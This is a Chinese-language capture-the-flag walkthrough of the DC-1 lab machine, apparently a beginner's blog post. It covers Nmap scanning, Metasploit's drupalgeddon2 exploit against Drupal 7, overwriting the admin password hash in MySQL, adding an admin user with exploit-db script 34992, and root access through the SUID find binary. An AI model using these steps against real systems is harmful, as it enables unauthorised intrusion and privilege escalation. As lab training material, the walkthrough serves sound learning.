DC-1通过解析(适合新手超详)

   使用Nmap命令对目标网络进行扫描,以识别活动主机和开放的端口

  命令行示例:Nmap -sP 192.168.1.0/24 和 Nmap -A -v -p- 192.168.172.128 

    Nmap -A -v -p- 

   识别目标网站使用的CMS(内容管理系统)为Drupal 7,并查找已知的漏洞。

   使用Metasploit框架查找并利用Drupal的漏洞。

    命令行示例:msfconsole,use exploit/unix/webapp/drupal_drupalgeddon2,set rhosts 192.168.172.128,run 

   进入以后输入python -c "import pty;pty.spawn('/bin/bash')"对于后续操做更加方便

    ls 查看一下文件发现flag1 

    Cat 查看一下flag1

     

    找找那个是配置文件查看一下sites文件夹在进入default查看settings.php文件发现flag2 

    下面还有数据库的用户名和密码直接进入数据库show databases;

     

    进入drupaldb :use drupaldb; 

    Users比较可疑查看一下 两个用户

    判断密码可能是哈希加密

    退出数据库找一下

      find . -name *hash* 真找到了

   这个文件是直接运行在后面加字符串返回哈希值

     

    登录MySQL数据库

    update users set pass='$S$DeXC.4Coyx980S7.vM35tKbd1AZ3l08zqUFVqjQFkYdnzLnJqAqM' where name='admin';

    更改admin密码直接改了

    改完后,我要说第二个方法了

    使用kali自带的searchsploit drupal 

     

   找到对应版本的漏洞利用文件

    python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.172.128 -u admin4 -p admin4

    直接添加一共用户这个用户有root权限

    然后拿去登录网页

    在后台找到flag3  

    在/etc/passwd下面有一个flag4

     

 

    尝试进入root目录发现进不去才提权的

    find / -perm -4000 -type f 2>/dev/null查找一下有root权限且可以使用的命令

     

    发现find命令那就简单了

     

    就是find随便一个文件然后执行用-exec执行以下/bin/sh就ok了

     

    搞定DC1 简简单单

    


 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值